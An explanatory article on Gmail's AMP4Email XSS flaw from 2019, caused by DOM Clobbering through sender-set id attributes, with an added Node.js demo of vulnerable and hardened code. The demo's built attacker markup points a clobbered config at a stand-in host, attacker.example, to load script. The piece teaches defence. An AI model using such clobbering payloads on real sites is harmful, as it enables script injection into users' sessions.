Gmail is one of the most popular email services. Its free tier is among the best you can find, and Google also offers a number of useful features that you will not find on other email services. One of them is dynamic email, also known as AMP4Email.
AMP4Email is one of Google's newer additions to Gmail. It lets a sender embed dynamic HTML content in a message, so the email itself becomes interactive: the recipient can, for example, fill out a questionnaire or browse a catalog directly inside the message, with a polished presentation, instead of following a link out to a website.
However, this new feature turned out to have a serious problem. In August 2019 a security researcher, Michał Bentkowski of Securitum, reported a bug in AMP4Email through the Google Vulnerability Reward Program. The bug allowed cross-site scripting (XSS): because AMP4Email lets the sender include HTML in an email, an attacker or phisher could craft a message whose markup caused script to run in the recipient's Gmail session.
The root of the problem is the id attribute. AMP4Email's validator strips most of what could be dangerous in HTML, but it does allow the sender to set id attributes on elements. A user-controlled id is exactly what an attacker needs for a DOM Clobbering attack: an element with a chosen id becomes a named property of the page's global object.
DOM Clobbering relies on a legacy browser behaviour: elements with an id (and, for some tags such as <a> and <form>, a name) are exposed as properties of the global window object. If an email contains <a id="username">, then window.username refers to that anchor, the same as document.getElementById('username'). A script that reads window.username expecting a value it defined itself instead gets an attacker-created element. In short, because AMP4Email let the sender set ids, it gave attackers a straightforward way to define such elements in the email body and use them to inject code.
A feature that makes it this easy to define named elements is a liability, and it raises the risk of DOM Clobbering considerably. DOM Clobbering is not a bug in one product; it is a legacy behaviour present in every major browser, and it has been the source of problems in many web applications that run in, or integrate with, the browser.
At first glance a clobbered global does not look dangerous, and the immediate issue can be fixed by tightening which HTML elements and attributes are accepted. But this case proved that script in an email could be made to execute through AMP4Email: by tweaking the markup and attributes of a message, an attacker had an open path into the recipient's session and could inject malicious code with far greater consequences.
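To make the mechanism concrete, here is a small added example (it is not code from this article, from Google, or from the AMP project) that models, in plain Node.js, the browser behaviour behind DOM Clobbering described above and the two defences the fix hinges on: a script that consults a config global is fed two attacker-supplied anchors sharing an id, the hardened version of that script rejects anything that is not a plain object, and a sanitizer step prefixes user-supplied id and name attributes. The config name CONFIG, the library URLs, and the attacker-controlled markup are all constructed for the demo and are not AMP's.

```javascript
// Added example, not code from the original article, Google, or the AMP project.
// Runs under plain Node.js, so the legacy browser rule that DOM clobbering abuses
// is modelled explicitly: an element with id="x" (or, for <a>, <form>, <img>,
// <embed>, <object>, <iframe>, name="x") becomes window.x, and two elements
// sharing an id yield an HTMLCollection whose named properties resolve by id/name.

// Minimal stand-in for a DOM element. String(anchor) in a browser is its href.
class ClobberedElement {
  constructor(tag, attrs) { this.tagName = tag.toUpperCase(); this.attrs = attrs; }
  getAttribute(name) { return Object.prototype.hasOwnProperty.call(this.attrs, name) ? this.attrs[name] : null; }
  toString() { return this.tagName === 'A' ? (this.attrs.href ?? '') : `[object HTML${this.tagName}Element]`; }
}

const TAG_RE = /<([a-z][a-z0-9]*)\b([^>]*)>/gi;
const ATTR_RE = /([a-z-]+)\s*=\s*"([^"]*)"/gi;
const NAME_EXPOSING_TAGS = new Set(['a', 'form', 'img', 'embed', 'object', 'iframe']);

// Index every element by id, and by name for the tags browsers expose by name.
function indexNamedElements(html) {
  const byKey = new Map();
  for (const [, tag, rawAttrs] of html.matchAll(TAG_RE)) {
    const attrs = {};
    for (const [, k, v] of rawAttrs.matchAll(ATTR_RE)) attrs[k.toLowerCase()] = v;
    const el = new ClobberedElement(tag, attrs);
    const keys = new Set([attrs.id]);
    if (NAME_EXPOSING_TAGS.has(tag.toLowerCase())) keys.add(attrs.name);
    for (const key of keys) {
      if (!key) continue;
      if (!byKey.has(key)) byKey.set(key, []);
      byKey.get(key).push(el);
    }
  }
  return byKey;
}

// Fake window: real globals win, anything else falls through to the page's
// named elements, which is the lookup order browsers apply.
function makeWindow(html, globals = {}) {
  const named = indexNamedElements(html);
  const resolve = (key) => {
    const els = named.get(key);
    if (!els) return undefined;
    if (els.length === 1) return els[0];
    const collection = [...els];            // stand-in for HTMLCollection
    for (const el of els) {
      for (const n of [el.attrs.id, el.attrs.name]) {
        if (n && !(n in collection)) collection[n] = el;
      }
    }
    return collection;
  };
  return new Proxy(globals, {
    get: (target, prop) => (typeof prop !== 'string' || prop in target) ? target[prop] : resolve(prop),
    has: (target, prop) => prop in target || named.has(prop),
  });
}

// Vulnerable pattern: a library decides where to load its code from based on an
// optional config global and trusts whatever it finds there.
function scriptUrlVulnerable(win) {
  const cfg = win.CONFIG;
  if (cfg && cfg.devServer) return String(cfg.devServer) + 'lib.js';
  return 'https://cdn.example.com/lib.js';
}

// Consumer-side fix: accept only a plain object holding a string, which a DOM
// node or an HTMLCollection can never be.
function isPlainObject(v) {
  return v !== null && typeof v === 'object' && Object.getPrototypeOf(v) === Object.prototype;
}
function scriptUrlHardened(win) {
  const cfg = win.CONFIG;
  if (isPlainObject(cfg) && typeof cfg.devServer === 'string') return cfg.devServer + 'lib.js';
  return 'https://cdn.example.com/lib.js';
}

// Sanitizer-side fix, the approach DOMPurify and GitHub's markup pipeline take:
// prefix user-supplied id/name values so they cannot collide with any global.
// (Regex over markup for the demo; a real sanitizer does this on the parsed DOM.)
function prefixNamedAttributes(html, prefix = 'user-content-') {
  return html.replace(/(?<![\w-])(id|name)(\s*=\s*")([^"]*)"/gi,
    (m, attr, eq, val) => `${attr}${eq}${prefix}${val}"`);
}

// Constructed attacker-controlled email body. Two anchors share id="CONFIG", so
// window.CONFIG becomes a collection and CONFIG.devServer resolves by name to
// the second anchor, whose string value is its href.
const attackerHtml =
  '<a id="CONFIG"></a>' +
  '<a id="CONFIG" name="devServer" href="https://attacker.example/"></a>' +
  '<a id="username">hi</a>';

function demo() {
  const win = makeWindow(attackerHtml);
  return {
    usernameIsElement: win.username instanceof ClobberedElement && win.username.getAttribute('id') === 'username',
    vulnerable: scriptUrlVulnerable(win),                                             // attacker URL
    hardened: scriptUrlHardened(win),                                                 // CDN URL
    sanitized: scriptUrlVulnerable(makeWindow(prefixNamedAttributes(attackerHtml))),  // CDN URL
    legit: scriptUrlHardened(makeWindow(attackerHtml, { CONFIG: { devServer: 'http://localhost:8000/' } })),
  };
}

console.log(demo());
```

Run it with node: the vulnerable function ends up with a script URL under attacker.example, while both the hardened function and the sanitized markup route through the CDN, and a real config object still works. Note the cost of the prefixing approach: it rewrites the ids users wrote, so in-page fragment links (#section) within the same content need the same rewrite, which is why sanitizers that use it handle both sides.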
Google has since released a fix for the problem introduced by its new feature. The patch addresses the DOM Clobbering issue and, with it, the risk of unwanted script being injected through AMP4Email.